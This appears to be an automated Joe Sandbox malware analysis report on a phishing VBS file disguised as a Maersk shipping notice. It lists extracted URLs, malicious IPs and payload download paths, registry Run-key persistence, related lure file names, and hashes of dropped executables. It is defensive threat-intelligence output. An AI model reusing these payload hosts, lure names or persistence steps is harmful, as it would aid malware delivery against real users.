http://ati.vn	MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://errors.statsmyapp.comxa	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.110.217/robx/remit.jpg	MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://anonfiles.com/	MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sumnermail.org/sumnerscools/school.php	MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://139.162.	MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://rghost.net/download/	MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/	MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	false		high
http://install.outbrowse.com/logTrack.php?x	MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://usa-national.info/gpu/band/grumble.dot	MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://w.robints.us/cnzz.htmlwidth=0height=0	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bitly.com/ad	MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	false		high
http://akrilikkapak.blogspot.com/	MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	false		high
https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php	MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://canonicalizer.ucsuri.tcs/3	MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://actresswallpaperbollywood.blogspot.com/	MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	false		high
http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://lo0oading.blogspot.com/	MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	false		high
http://www.youtube.com/watch?v=Vjp7vgj119s	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false		high
http://spywaresoftstop.com/load.php?adv=141	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sotheraho.com/wp-content/fonts/reportexcelnew.php	MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb	MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://eduardovolpi.com.br/flipbook/postal/services/parcel)	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sweetsizing.com/vip/	MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tikotin.com	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false		high
http://security-updater.com/binaries/	MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://5starvideos.com/main/K5	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://77.81.225.138/carnaval2017.zip	MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.wikitextbooks.info	MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aartemis.com/?type=sc&ts=	MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	false		high
https://tinyurl.com/up77pck	MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	false		high
https://bemojo.com/ds/161120.gif	MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mvps.org/vb	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false		high
http://avnpage.info/final3.php	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esiglass.it/glassclass/glass.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://rotf.lol/3u6d9443	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aerytyre.blogspot.com/	MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	false		high
http://blogsemasacaparnab.blogspot.com/	MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	false		high
https://raw.githubusercontent.com/	MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png	MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	false		high
https://mort2021.s3-eu-west-1.amazonaws.com/image2.png	MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	false		high
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.51jetso.com/	MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kvdcmi	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false		high
http://www.searchmaid.com/	MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://remote.bittorrent.com	MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	false		high
http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs	MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	false		high
http://tbapi.search.ask.comxb	MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mva.by/tags/ariscanin1.e	MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://javafx.com	MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://masgiO.info/cd/cd.php?id=%s&ver=g	MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sds.clrsch.com/x	MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://playsong.mediasongplayer.com/	MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tiasissi.com.br/revendedores/jquery/	MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://207.154.225.82/report.json?type=mail&u=$muser&c=	MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiuzhe.com/ddvan.exe	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://66.148.74.7/zu2/zc.php	MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://t.zer9g.com/	MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://149.3.170.235/qw-fad/	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://maringareservas.com.br/queda/index.php	MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://82.98.235.	MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://verred.net/?1309921	MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pigeonious.com/img/	MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://team.afcorp.afg/chr/crt-ho_30/newjflibrary	MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://artishollywoodbikini.blogspot.com/	MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	false		high
http://data1.yoou8.com/	MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kthd4j	MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	false		high
http://handjobheats.com/xgi-bin/q.php	MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpurifier.com/buynow/?	MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://longurl.in/tllwu	MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://safedental.org/wp-includes/css/report-maerskline.php	MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://%63%61%39%78%2e%63%6f%6d/ken.gif	MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://logs-01.loggly.com/inputs	MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	false		high
https://cdn4.buysellads.net/pub/tempmail.js?	MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://memberservices.passport.net/memberservice.srf	MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mybrowserbar.com/cgi/coupons.cgi/	MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://bdsmforyoungs.blogspot.com/	MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	false		high
http://www.sniperspy.com/guide.html	MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.104.197.90	septnet.duckdns.org	unknown		1299	TELIANETTeliaCarrierEU	true
178.32.63.50	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1607
Start date:	12.10.2021
Start time:	04:37:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.mine.winVBS@21/230@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.82.19.171, 51.105.236.244, 20.82.210.154, 92.123.195.50, 92.123.195.73, 93.184.221.240, 20.82.209.183, 52.242.101.226, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.50.102.62, 52.109.8.19 Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, slscr.update.microsoft.com.akadns.net, definitionupdates.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, e3673.g.akamaiedge.net, wu.ec.azureedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, prod.nexusrules.live.com.akadns.net, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, go.microsoft.com.edgekey.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, www.microsoft.com, nexusrules.officeapps.live.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:40:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PERAMELINE C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe
04:40:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PERAMELINE C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
178.32.63.50	BROCATELLE.exe	Get hash	malicious	Browse	178.32.63.50/mvbs/remvbs_IRLmSwGGFI160.bin
	Contract-No-AJ-1343CL-REFERENCE-837373HHYAAHYSBDDS3736362_OCTOBER-2021.vbs	Get hash	malicious	Browse	178.32.63.50/mvbs/remvbs_IRLmSwGGFI160.bin
	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	178.32.63.50/moss/nancata_RbkGW109.bin
	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	178.32.63.50/moss/Host_AKhLBP62.bin
	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	178.32.63.50/mt/nansept_YbjxsPwq12.bin
	nSOA_Statement-of-Account_desk-of-account-receivable-june-august-2021-cummulative.exe	Get hash	malicious	Browse	178.32.63.50/ma/Host_wfKdFDKfLU89.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
septnet.duckdns.org	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	gFPbTs1YDm.exe	Get hash	malicious	Browse	91.121.250.249
	FYrMKmDjFi.exe	Get hash	malicious	Browse	91.121.250.249
	payment copy 20211011.exe	Get hash	malicious	Browse	51.210.156.152
	tz4Ol5gzOT	Get hash	malicious	Browse	51.83.31.49
	SAUERMANN NEW ORDER.exe	Get hash	malicious	Browse	198.50.252.64
	justificante de la transfer.exe	Get hash	malicious	Browse	54.36.109.179
	jew.x86	Get hash	malicious	Browse	54.39.101.214
	jew.arm7	Get hash	malicious	Browse	51.38.181.174
	Halkbank,doc 29092021.7.exe	Get hash	malicious	Browse	51.210.156.152
	Exodus.exe	Get hash	malicious	Browse	51.178.146.151
	1cG7fOkPjS.exe	Get hash	malicious	Browse	37.187.131.150
	test2.html	Get hash	malicious	Browse	158.69.141.29
	cerber.exe	Get hash	malicious	Browse	178.33.160.110
	SecuriteInfo.com.Trojan.MulDropNET.43.8032.exe	Get hash	malicious	Browse	51.255.34.118
	CONFIRM PROFORMA INVOICE NO 21091042 21091044.exe	Get hash	malicious	Browse	51.210.156.152
	Exodus.exe	Get hash	malicious	Browse	51.178.146.151
	1701667874-10042021.xls	Get hash	malicious	Browse	5.196.247.11
	1701667874-10042021.xls	Get hash	malicious	Browse	5.196.247.11
	FOL_JDHD98373_AMAZON_COMPROBANTE_FISCAL_DIGITAL_0398309_JDHSGGS.html	Get hash	malicious	Browse	144.217.139.163
	BROCATELLE.exe	Get hash	malicious	Browse	178.32.63.50
TELIANETTeliaCarrierEU	BROCATELLE.exe	Get hash	malicious	Browse	193.104.197.105
	Contract-No-AJ-1343CL-REFERENCE-837373HHYAAHYSBDDS3736362_OCTOBER-2021.vbs	Get hash	malicious	Browse	193.104.197.105
	e18hGJfKoy	Get hash	malicious	Browse	178.76.5.199
	zCS6X4TGYb	Get hash	malicious	Browse	193.45.0.11
	46gV91KJhQ	Get hash	malicious	Browse	213.155.129.251
	nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28
	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	Get hash	malicious	Browse	193.104.197.28
	0HXxUcP5S4	Get hash	malicious	Browse	217.212.229.228
	S7wQtTgZBF	Get hash	malicious	Browse	104.123.190.203
	rod3gmxCHK	Get hash	malicious	Browse	178.76.5.162
	i686	Get hash	malicious	Browse	178.76.5.180
	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	193.104.197.30
	1JFod4taFm	Get hash	malicious	Browse	193.45.0.22
	ofgE8wetW4	Get hash	malicious	Browse	213.155.150.24
	jew.x86	Get hash	malicious	Browse	80.239.196.190
	vigmCKdmz9	Get hash	malicious	Browse	178.78.11.99
	tohlIdtsnN	Get hash	malicious	Browse	62.115.122.3
	YQqx8LTbmF	Get hash	malicious	Browse	62.115.122.8
	DbGr5tUs3N	Get hash	malicious	Browse	193.45.0.10
	sora.x86	Get hash	malicious	Browse	80.239.148.228

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	1gPmnCR2PX.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	Get hash	malicious	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	1gPmnCR2PX.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90114
Entropy (8bit):	6.176120840793422
Encrypted:	false
SSDEEP:	1536:QhVs0kRE/a2WXJ633x4Cx1Kq/Vd1PhhyI8jstoidUr:QjAGtc63XvK8d1Pz5Sr
MD5:	C7778BEEB7B4EE95495E9268EB7DC6A2
SHA1:	1BB4978F7A7AFAFFDDA28465D883157A83487E23
SHA-256:	9AAE447ECF7C9B42058153993D02DCC0EF2D92984A0987CF543E6E132740E2EA
SHA-512:	CE2FB8E246AB977726D19B4562A5502FBC8A8E4038FFA6FA15D02FDEDFA6FDB3D780648058478CA532865444D7441764840DB98867662CF27102A946701AFCCC
Malicious:	true
Joe Sandbox View:	Filename: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L......W................. ...P...............0....@.................................)%......................................d...(....`..z...................................................................(... .......(............................text...L........ .................. ..`.data...x ...0.......0..............@....rsrc...z....`... ...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FLGEBREV\COCKFIGHT.exe Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	data
Category:	dropped
Size (bytes):	90115
Entropy (8bit):	6.176073293832656
Encrypted:	false
SSDEEP:	1536:dhVs0kRE/a2WXJ633x4Cx1Kq/Vd1PhhyI8jstoidU8:djAGtc63XvK8d1Pz5S8
MD5:	A9E34DD27467F3753981EE787008C8E5
SHA1:	1DD7E4C80FBCDED234C56EE3A361EAAC70993C31
SHA-256:	64DA0B21E1BBB342F9817C7FD3B1C9E31A25D699429B1494E22B6FBC10F149EE
SHA-512:	2E6E9627C79844C6217571BB8B4227A06D0396A83F6DCE06C2CCA87FB627BA2B1BC41228365F8A077619614E6E68B8A35CF992B7742927C64CA9496B50D13527
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L......W................. ...P...............0....@.................................)%......................................d...(....`..z...................................................................(... .......(............................text...L........ .................. ..`.data...x ...0.......0..............@....rsrc...z....`... ...@..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	454904
Entropy (8bit):	6.2829164628823575
Encrypted:	false
SSDEEP:	6144:p+BaOdQrqYpWVCPpYXe14f6eFL+TFFzE/tzkY5WwuTWOahE:kQ2YpWkPiXe14f6eFL6FA/zWwgChE
MD5:	065E4E5BE96865266D1FC4449274CE20
SHA1:	C6FF45B448F7B828D8C6369B5DE95B41E685F502
SHA-256:	98E3951BA9FACFB2B878D98D237D63C675878A09D9B6E18640C96746B6665041
SHA-512:	E63A5CF20678757F3FA277C56576F0DFBFF41DCBE61BEEFF28C608EE5D2BE2766E16A93E2FC423E6697670AC7E164E2B29EE5755AADAAE1C58B6F6F3FE1A6481
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1gPmnCR2PX.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............._..._..._...^..._..x_..._K..^..._K..^..._K..^N.._K..^..._..._..._...^..._..._..._...^..._Rich..._........................PE..d......m.........."..........P.......u.........@.....................................]....`.......... ...................................................#...p...9....... ...... ...8f..p...................8...(.......8...........`...8............................text............................... ..`.rdata...u..........................@..@.data...PD... ...0... ..............@....pdata...9...p...@...P..............@..@.rsrc....#.......0..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	303352
Entropy (8bit):	6.103843753653899
Encrypted:	false
SSDEEP:	6144:6CFCIAsyTqaF2uNoLQ7iF5K8+v5y8hCs2Y:6ypfyTqIL6LQ7iF5K8+484BY
MD5:	8C7A45FC0FDFB95104C84A68EAFBD170
SHA1:	D770064F1956FF05248E4C56DCF511928A7D8C3F
SHA-256:	B0A45EEB123840F105A40DB938553801C54DC5EED5FD2F710AC7EA24E16D0B56
SHA-512:	CD0B5A72D12B513B9EE160C1A18275893480488378A0E8E241600F0DCB1275B1F3CDC3C0096345D9A2B942C800484DC0E5210E0C4B409D5FE69B94716CE432FF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1gPmnCR2PX.exe, Detection: malicious, Browse Filename: FACTURA.exe, Detection: malicious, Browse Filename: Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q[.'5:}t5:}t5:}t.O\|u7:}t.O~u4:}t<B.t1:}t.H\|u,:}t5:\|tM;}t.Hyu(:}t.H~u;:}t.Hxu.:}t.O}u4:}t.Otuy:}t.O.t4:}t.O.u4:}tRich5:}t........................PE..d...c..P.........." ......................................................................`A........................................0...p............p.......@..`$....... ......8.......p...................h@..(...0?..8............@...............................text...L........................... ..`.rdata..............................@..@.data....-....... ..................@....pdata..`$...@...0...0..............@..@.rsrc........p.......`..............@..@.reloc..8............p..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
